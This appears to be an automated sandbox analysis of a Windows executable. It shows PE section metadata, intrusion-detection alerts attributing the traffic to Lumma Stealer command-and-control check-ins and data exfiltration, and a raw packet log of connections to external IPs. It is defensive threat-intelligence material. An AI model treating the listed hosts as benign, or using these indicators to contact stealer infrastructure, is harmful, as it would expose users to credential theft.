                                                                                                                                                                                                                      0x10000x550000x25e0024825274edb1dab14a8a6dd0dbb6f54aFalse0.9973442656765676data7.973721758496147IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .rsrc 0x560000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .idata 0x570000x10000x200b32b7c4ad821f82288405a0d11e75f2fFalse0.15625data1.1076713340399604IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      0x580000x2a50000x2006a7d996f182026fc0fbd53e80bc91748unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      fpcukdxy0x2fd0000x1990000x19860085f5db77b6f556b2b486533469515ea0False0.9940754610498929data7.954084488701993IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      qisnsufv0x4960000x10000x400c909257a9d34e205c940408e91b5419cFalse0.8017578125data6.16837124084642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      .taggant0x4970000x30000x22008dad65732460c09fcdac1fbff8dbdd12False0.05939797794117647DOS executable (COM)0.7931831446191998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                      DLLImport
                                                                                                                                                                                                                      kernel32.dlllstrcpy
                                                                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                      2024-11-20T17:41:22.009186+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749704104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:22.702248+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749704104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:22.702248+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749704104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:24.119056+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749706104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:24.840747+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749706104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:24.840747+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749706104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:26.458844+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749712104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:28.704099+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749718104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:31.461865+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749724104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:34.126293+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749730104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:34.893185+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749730104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:36.671229+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749737104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:42.030785+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749757104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:42.640545+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749757104.21.66.38443TCP
                                                                                                                                                                                                                      2024-11-20T17:41:44.283348+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.749758185.215.113.1680TCP
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Nov 20, 2024 17:41:14.860528946 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                      Nov 20, 2024 17:41:14.860552073 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                      Nov 20, 2024 17:41:15.016925097 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                      Nov 20, 2024 17:41:15.297130108 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                      Nov 20, 2024 17:41:15.673003912 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                      Nov 20, 2024 17:41:16.079268932 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                                      Nov 20, 2024 17:41:16.423120022 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                      Nov 20, 2024 17:41:17.923178911 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.710547924 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.710644007 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.710794926 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.714026928 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.714065075 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.907397032 CET49677443192.168.2.720.50.201.200
                                                                                                                                                                                                                      Nov 20, 2024 17:41:21.225749969 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:21.225796938 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:21.225864887 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:21.226370096 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:21.226382971 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.009048939 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.009186029 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.013520956 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.013554096 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.013973951 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.064754963 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.064826012 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.065043926 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.702234983 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.702434063 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.702512980 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.731839895 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.731893063 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.731921911 CET49704443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.731940985 CET44349704104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.832767963 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.832827091 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.832916021 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.833339930 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.833370924 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.953083992 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.953172922 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.957053900 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.957062960 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.957313061 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.967415094 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.011360884 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.430665970 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.430696011 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.430711031 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.430802107 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.430820942 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.430892944 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.612009048 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.612042904 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.612289906 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.612310886 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.612401962 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.655863047 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.655886889 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.655989885 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.656001091 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.656049013 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.656049013 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.782846928 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.782890081 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.782944918 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.782959938 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.783009052 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.783010006 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.819910049 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.819933891 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.820041895 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.820051908 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.820076942 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.820128918 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.843327999 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.843354940 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.843453884 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.843453884 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.843463898 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.843556881 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.864712000 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.864736080 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.864861965 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.864871025 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:23.864932060 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.107959032 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.107980013 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108165979 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108180046 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108194113 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108300924 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108306885 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108469009 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108475924 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.108583927 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.109611034 CET49705443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.109627008 CET4434970513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.118956089 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.119055986 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.120841026 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.120858908 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.121270895 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.122731924 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.122817039 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.122852087 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.145643950 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.145675898 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.145776987 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.146369934 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.146382093 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.147506952 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.147541046 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.147608995 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.148040056 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.148056984 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.149777889 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.149859905 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.149931908 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.150468111 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.150510073 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.150803089 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.150813103 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.150862932 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.150996923 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.151009083 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.152296066 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.152344942 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.152427912 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.152514935 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.152533054 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.469881058 CET49674443192.168.2.7104.98.116.138
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.469914913 CET49675443192.168.2.7104.98.116.138
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.626173019 CET49672443192.168.2.7104.98.116.138
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.840756893 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.840811968 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.840846062 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.840884924 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.840948105 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.841073036 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.841097116 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.841181040 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.843422890 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.848987103 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.849081039 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.849097013 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.857361078 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.857450962 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.857469082 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.907504082 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.907541990 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:24.954349995 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.026726961 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.032907963 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.032980919 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.033001900 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.033062935 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.034862041 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.034900904 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.034925938 CET49706443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.034944057 CET44349706104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.142419100 CET49712443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.142462015 CET44349712104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.142559052 CET49712443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.143038034 CET49712443192.168.2.7104.21.66.38
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.143053055 CET44349712104.21.66.38192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.688736916 CET49671443192.168.2.7204.79.197.203
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.945590019 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.945967913 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.946275949 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.946295977 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.946738958 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.946752071 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.946773052 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.946778059 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.947365046 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.947370052 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.948446035 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.948894978 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.948903084 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.949445009 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.949450016 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.951256037 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.951576948 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.951591969 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.951961994 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.952095985 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.952101946 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.952307940 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.952323914 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.952697992 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:25.952703953 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.393290997 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.393450022 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.393527985 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.394393921 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.394407034 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.394418001 CET49708443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.394423962 CET4434970813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.398195982 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.398226023 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.398323059 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.398528099 CET49713443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.398541927 CET4434971313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.398971081 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401318073 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401345968 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401408911 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401420116 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401468992 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401628017 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401633024 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401648998 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401839018 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401875019 CET4434971013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.401918888 CET49710443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402256012 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402273893 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402301073 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402324915 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402359962 CET49709443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402379990 CET4434970913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402390003 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402396917 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402641058 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402653933 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402661085 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402811050 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402843952 CET4434971113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.402893066 CET49711443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.403043032 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.403075933 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.403135061 CET49707443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.403145075 CET4434970713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:26.403198004 CET49707443192.168.2.713.107.246.63
